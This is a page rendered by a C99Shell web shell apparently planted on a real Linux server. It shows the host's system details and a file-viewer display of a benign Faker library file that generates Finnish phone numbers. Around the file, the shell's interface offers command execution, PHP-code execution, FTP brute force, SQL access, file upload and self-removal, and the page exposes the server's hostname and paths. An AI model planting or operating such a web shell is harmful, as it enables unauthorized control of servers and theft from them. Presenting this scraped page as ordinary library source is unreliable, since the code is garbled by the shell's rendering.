!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/gwp.picotech.app/public_html/vendor/fakerphp/faker/src/Faker/Provider/fi_FI/   drwxr-xr-x
Free 29.26 GB of 117.98 GB (24.8%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     PhoneNumber.php (2.29 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Faker\Provider\fi_FI;

class 
PhoneNumber extends \Faker\Provider\PhoneNumber
{
    
/**
     * @see https://www.viestintavirasto.fi/en/internettelephone/numberingoftelecommunicationsnetworks/localcallsandtelecommunicationsareas/mapoftelecommunicationsareas.html
     *
     * @var array
     */
    
protected static $landLineareaCodes = [
        
'02',
        
'03',
        
'05',
        
'06',
        
'08',
        
'09',
        
'013',
        
'014',
        
'015',
        
'016',
        
'017',
        
'018',
        
'019',
    ];

    
/**
     * @see https://www.viestintavirasto.fi/en/internettelephone/numberingoftelecommunicationsnetworks/mobilenetworks/mobilenetworkareacodes.html
     *
     * @var array
     */
    
protected static $mobileNetworkAreaCodes = [
        
'040',
        
'050',
        
'044',
        
'045',
    ];

    protected static 
$numberFormats = [
        
'### ####',
        
'#######',
    ];

    protected static 
$formats = [
        
'+358 ({{ e164MobileNetworkAreaCode }}) {{ numberFormat }}',
        
'+358 {{ e164MobileNetworkAreaCode }} {{ numberFormat }}',
        
'+358 ({{ e164landLineAreaCode }}) {{ numberFormat }}',
        
'+358 {{ e164landLineAreaCode }} {{ numberFormat }}',
        
'{{ mobileNetworkAreaCode }}{{ separator }}{{ numberFormat }}',
        
'{{ landLineAreaCode }}{{ separator }}{{ numberFormat }}',
    ];

    
/**
     * @return string
     */
    
public function landLineAreaCode()
    {
        return static::
randomElement(static::$landLineareaCodes);
    }

    
/**
     * @return string
     */
    
public function e164landLineAreaCode()
    {
        return 
substr(static::randomElement(static::$landLineareaCodes), 1);
    }

    
/**
     * @return string
     */
    
public function mobileNetworkAreaCode()
    {
        return static::
randomElement(static::$mobileNetworkAreaCodes);
    }

    
/**
     * @return string
     */
    
public function e164MobileNetworkAreaCode()
    {
        return 
substr(static::randomElement(static::$mobileNetworkAreaCodes), 1);
    }

    
/**
     * @return string
     */
    
public function numberFormat()
    {
        return static::
randomElement(static::$numberFormats);
    }

    
/**
     * @return string
     */
    
public function separator()
    {
        return static::
randomElement([' ''-']);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--